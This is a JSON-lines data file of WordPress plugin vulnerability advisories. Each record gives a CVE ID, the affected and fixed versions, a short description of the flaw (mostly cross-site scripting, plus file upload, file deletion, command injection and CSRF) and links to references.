{"CVE_ID":"CVE-2024-11458","slug":"faq-builder-ays","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The FAQ Builder AYS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ays_faq_tab' parameter in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-builder-ays\\\/tags\\\/1.7.0\\\/admin\\\/partials\\\/faq-builder-ays-admin-actions.php#L281\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-builder-ays\\\/tags\\\/1.7.0\\\/admin\\\/partials\\\/faq-builder-ays-admin-actions.php#L281\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-builder-ays\\\/tags\\\/1.7.1\\\/admin\\\/partials\\\/faq-builder-ays-admin-actions.php#L281\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-builder-ays\\\/tags\\\/1.7.1\\\/admin\\\/partials\\\/faq-builder-ays-admin-actions.php#L281\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-builder-ays\\\/tags\\\/1.7.2\\\/admin\\\/partials\\\/faq-builder-ays-admin-actions.php#L281\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-builder-ays\\\/tags\\\/1.7.2\\\/admin\\\/partials\\\/faq-builder-ays-admin-actions.php#L281\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c509345b-441f-474d-ad3a-720801859f86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c509345b-441f-474d-ad3a-720801859f86?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5746","slug":"drag-and-drop-file-uploads-wc-pro","versionImpact":"5.0.5","versionEndExcluding":"1.7.2","description":"The Drag and Drop Multiple File Upload (Pro) - WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the dnd_upload_cf7_upload_chunks() function in version 5.0 - 5.0.5 (when bundled with the PrintSpace theme) and all versions up to, and including, 1.7.1 (in the standalone version). This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. The execution of PHP is disabled via a .htaccess file but is still possible in certain server configurations.","recommendation":"Update to one of the following versions, or a newer patched version: 1.7.2, 5.0.7","refs":"[{\"url\":\"https:\\\/\\\/www.codedropz.com\\\/woocommerce-drag-drop-multiple-file-upload\\\/\",\"name\":\"https:\\\/\\\/www.codedropz.com\\\/woocommerce-drag-drop-multiple-file-upload\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c1f625e-4456-45e4-8a7f-809b22edb66b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c1f625e-4456-45e4-8a7f-809b22edb66b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5921","slug":"sureforms","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The SureForms  WordPress plugin before 1.7.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both authenticated and unauthenticated users.","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/052fb6cf-274e-468b-a7e0-0e7a1751ec75\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/052fb6cf-274e-468b-a7e0-0e7a1751ec75\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5290","slug":"borderless","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The Borderless \u2013 Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title\u2019 parameter in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/assets\\\/scripts\\\/borderless-elementor.min.js#L230\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/assets\\\/scripts\\\/borderless-elementor.min.js#L230\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/assets\\\/scripts\\\/borderless-elementor.min.js#L288\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/assets\\\/scripts\\\/borderless-elementor.min.js#L288\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/assets\\\/scripts\\\/borderless-elementor.min.js#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/assets\\\/scripts\\\/borderless-elementor.min.js#L72\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/circular-progress-bar.php#L433\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/circular-progress-bar.php#L433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/progress-bar.php#L417\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/progress-bar.php#L417\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/semi-circular-progress-bar.php#L410\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/semi-circular-progress-bar.php#L410\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302155\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302155\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4492aede-b68d-46b8-955f-81ebdc875921?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4492aede-b68d-46b8-955f-81ebdc875921?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4605","slug":"breakdance","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The Breakdance plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.7.1 via post meta data. This is due to the plugin storing custom data in metadata without an underscore prefix. This makes it possible for lower privileged users, such as contributors, to edit this data via UI. As a result they can escalate their privileges or execute arbitrary code.","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/breakdance.com\\\/breakdance-1-7-2-now-available-security-update\\\/\",\"name\":\"https:\\\/\\\/breakdance.com\\\/breakdance-1-7-2-now-available-security-update\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/095b23b7-71ab-41eb-b666-73df2e1a7eb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/095b23b7-71ab-41eb-b666-73df2e1a7eb4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13616","slug":"vikbooking","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The VikBooking Hotel Booking Engine & PMS WordPress plugin before 1.7.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44b3a2d9-a2e1-43dd-b27a-1ad9d6015c9b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44b3a2d9-a2e1-43dd-b27a-1ad9d6015c9b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0434","slug":"tour-booking-manager","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The WordPress Tour & Travel Booking Plugin for WooCommerce \u2013 WpTravelly plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ttbm_new_place_save' function in all versions up to, and including, 1.7.1. This makes it possible for unauthenticated attackers to create and publish new place posts. This function is also vulnerable to CSRF.","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e84d3e22-8568-4bdb-be9b-ffe78c69ec24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e84d3e22-8568-4bdb-be9b-ffe78c69ec24?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tour-booking-manager\\\/trunk\\\/admin\\\/settings\\\/tour\\\/TTBM_Settings_place_you_see.php#L225\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tour-booking-manager\\\/trunk\\\/admin\\\/settings\\\/tour\\\/TTBM_Settings_place_you_see.php#L225\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3092969%40tour-booking-manager%2Ftrunk&old=3091912%40tour-booking-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3092969%40tour-booking-manager%2Ftrunk&old=3091912%40tour-booking-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4627","slug":"shiftnav-responsive-mobile-menu","versionEndExcluding":"1.7.2","description":"The ShiftNav WordPress plugin before 1.7.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be9e8870-0682-441d-8955-d096d1346bd1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be9e8870-0682-441d-8955-d096d1346bd1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5469","slug":"drop-shadow-boxes","versionImpact":"1.7.13","versionEndExcluding":"1.7.14","description":"The Drop Shadow Boxes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'dropshadowbox' shortcode in versions up to, and including, 1.7.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0b3911c-a960-4f28-b289-389b26282741?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0b3911c-a960-4f28-b289-389b26282741?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drop-shadow-boxes\\\/tags\\\/1.7.12\\\/dropshadowboxes.php#L319\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drop-shadow-boxes\\\/tags\\\/1.7.12\\\/dropshadowboxes.php#L319\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2998610\\\/drop-shadow-boxes#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2998610\\\/drop-shadow-boxes#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4346","slug":"startklar-elmentor-forms-extwidgets","versionImpact":"1.7.13","versionEndExcluding":"1.7.14","description":"The Startklar Elementor Addons plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 1.7.13. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.","recommendation":"Update to version 1.7.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a125bbf1-8ff6-4f3d-a4fb-caaaefe1df2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a125bbf1-8ff6-4f3d-a4fb-caaaefe1df2a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/startklar-elmentor-forms-extwidgets\\\/trunk\\\/startklarDropZoneUploadProcess.php?rev=3061298#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/startklar-elmentor-forms-extwidgets\\\/trunk\\\/startklarDropZoneUploadProcess.php?rev=3061298#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081987\\\/startklar-elmentor-forms-extwidgets\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081987\\\/startklar-elmentor-forms-extwidgets\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4345","slug":"startklar-elmentor-forms-extwidgets","versionImpact":"1.7.13","versionEndExcluding":"1.7.14","description":"The Startklar Elementor Addons plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'process' function in the 'startklarDropZoneUploadProcess' class in versions up to, and including, 1.7.13. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.7.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4221b33c-5cfa-48db-92bf-bf25ff3c5a5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4221b33c-5cfa-48db-92bf-bf25ff3c5a5f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/startklar-elmentor-forms-extwidgets\\\/trunk\\\/startklarDropZoneUploadProcess.php?rev=3061298#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/startklar-elmentor-forms-extwidgets\\\/trunk\\\/startklarDropZoneUploadProcess.php?rev=3061298#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081987\\\/startklar-elmentor-forms-extwidgets\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081987\\\/startklar-elmentor-forms-extwidgets\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6486","slug":"imagemagick-engine","versionImpact":"1.7.10","versionEndExcluding":"1.7.11","description":"The ImageMagick Engine ImageMagick Engine WordPress plugin before 1.7.11 for WordPress is vulnerable to OS Command Injection via the \"cli_path\" parameter. This allows authenticated attackers, with administrator-level permission to execute arbitrary OS commands on the server leading to remote code execution.","recommendation":"Update to version 1.7.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a57c0c59-8b5c-4221-a9db-19f141650d9b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a57c0c59-8b5c-4221-a9db-19f141650d9b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3813","slug":"royal-elementor-addons","versionImpact":"1.7.1020","versionEndExcluding":"1.7.1021","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_elementor_data\u2019 parameter in all versions up to, and including, 1.7.1020 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1021, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1021\\\/classes\\\/modules\\\/forms\\\/wpr-submissions-cpt.php?rev=3301438\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1021\\\/classes\\\/modules\\\/forms\\\/wpr-submissions-cpt.php?rev=3301438\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/classes\\\/modules\\\/forms\\\/wpr-submissions-cpt.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/classes\\\/modules\\\/forms\\\/wpr-submissions-cpt.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/classes\\\/modules\\\/forms\\\/wpr-submissions-cpt.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/classes\\\/modules\\\/forms\\\/wpr-submissions-cpt.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b957eb0d-882d-4646-ad84-9c64f957be14?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b957eb0d-882d-4646-ad84-9c64f957be14?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12120","slug":"royal-elementor-addons","versionImpact":"1.7.1017","versionEndExcluding":"1.7.1018","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown widget display_message_text parameter in all versions up to, and including, 1.7.1017 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1018, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236381\\\/royal-elementor-addons\\\/tags\\\/1.7.1008\\\/modules\\\/countdown\\\/widgets\\\/wpr-countdown.php?old=3220755&old_path=royal-elementor-addons%2Ftags%2F1.7.1007%2Fmodules%2Fcountdown%2Fwidgets%2Fwpr-countdown.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236381\\\/royal-elementor-addons\\\/tags\\\/1.7.1008\\\/modules\\\/countdown\\\/widgets\\\/wpr-countdown.php?old=3220755&old_path=royal-elementor-addons%2Ftags%2F1.7.1007%2Fmodules%2Fcountdown%2Fwidgets%2Fwpr-countdown.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3285549\\\/royal-elementor-addons\\\/tags\\\/1.7.1018\\\/assets\\\/js\\\/frontend.js?old=3277554&old_path=royal-elementor-addons%2Ftags%2F1.7.1017%2Fassets%2Fjs%2Ffrontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3285549\\\/royal-elementor-addons\\\/tags\\\/1.7.1018\\\/assets\\\/js\\\/frontend.js?old=3277554&old_path=royal-elementor-addons%2Ftags%2F1.7.1017%2Fassets%2Fjs%2Ffrontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ee7b4d8-c397-41f6-981f-9a010e4ab2f1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ee7b4d8-c397-41f6-981f-9a010e4ab2f1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1456","slug":"royal-elementor-addons","versionImpact":"1.7.1012","versionEndExcluding":"1.7.1013","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `widgetGrid`, `widgetCountDown`, and `widgetInstagramFeed` methods in all versions up to, and including, 1.7.1012 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1013, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/assets\\\/js\\\/frontend.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/assets\\\/js\\\/frontend.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262790\\\/royal-elementor-addons\\\/tags\\\/1.7.1013\\\/assets\\\/js\\\/frontend.js?old=3255849&old_path=royal-elementor-addons%2Ftags%2F1.7.1012%2Fassets%2Fjs%2Ffrontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262790\\\/royal-elementor-addons\\\/tags\\\/1.7.1013\\\/assets\\\/js\\\/frontend.js?old=3255849&old_path=royal-elementor-addons%2Ftags%2F1.7.1012%2Fassets%2Fjs%2Ffrontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68c6e428-b9cf-442f-a896-a8ceb4b9be0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68c6e428-b9cf-442f-a896-a8ceb4b9be0e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1455","slug":"royal-elementor-addons","versionImpact":"1.7.1012","versionEndExcluding":"1.7.1013","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Woo Grid widget in all versions up to, and including, 1.7.1012 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1013, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/woo-grid\\\/widgets\\\/wpr-woo-grid.php#L9280\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/woo-grid\\\/widgets\\\/wpr-woo-grid.php#L9280\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262790\\\/royal-elementor-addons\\\/tags\\\/1.7.1013\\\/modules\\\/woo-grid\\\/widgets\\\/wpr-woo-grid.php?old=3255849&old_path=royal-elementor-addons%2Ftags%2F1.7.1012%2Fmodules%2Fwoo-grid%2Fwidgets%2Fwpr-woo-grid.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262790\\\/royal-elementor-addons\\\/tags\\\/1.7.1013\\\/modules\\\/woo-grid\\\/widgets\\\/wpr-woo-grid.php?old=3255849&old_path=royal-elementor-addons%2Ftags%2F1.7.1012%2Fmodules%2Fwoo-grid%2Fwidgets%2Fwpr-woo-grid.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5666e2b7-acb3-4abb-ac2a-1575206435cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5666e2b7-acb3-4abb-ac2a-1575206435cf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1441","slug":"royal-elementor-addons","versionImpact":"1.7.1007","versionEndExcluding":"1.7.1008","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7.1007. This is due to missing or incorrect nonce validation on the 'wpr_filter_woo_products' function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.1008, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1007\\\/classes\\\/modules\\\/wpr-filter-woo-products.php#L1895\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1007\\\/classes\\\/modules\\\/wpr-filter-woo-products.php#L1895\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1008\\\/classes\\\/modules\\\/wpr-filter-woo-products.php#L1904\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1008\\\/classes\\\/modules\\\/wpr-filter-woo-products.php#L1904\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bc6a436-6df3-4eaf-a16b-d8b3c3ca7d87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bc6a436-6df3-4eaf-a16b-d8b3c3ca7d87?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10798","slug":"royal-elementor-addons","versionImpact":"1.7.1003","versionEndExcluding":"1.7.1004","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.7.1003 via the 'wpr-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created via Elementor that they should not have access to.","recommendation":"Update to version 1.7.1004, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195352\\\/royal-elementor-addons\\\/tags\\\/1.7.1004\\\/admin\\\/includes\\\/wpr-templates-shortcode.php?old=3193132&old_path=royal-elementor-addons%2Ftags%2F1.7.1003%2Fadmin%2Fincludes%2Fwpr-templates-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195352\\\/royal-elementor-addons\\\/tags\\\/1.7.1004\\\/admin\\\/includes\\\/wpr-templates-shortcode.php?old=3193132&old_path=royal-elementor-addons%2Ftags%2F1.7.1003%2Fadmin%2Fincludes%2Fwpr-templates-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a7ef5a0-f6c8-41e1-bb3b-119a682be69f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a7ef5a0-f6c8-41e1-bb3b-119a682be69f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
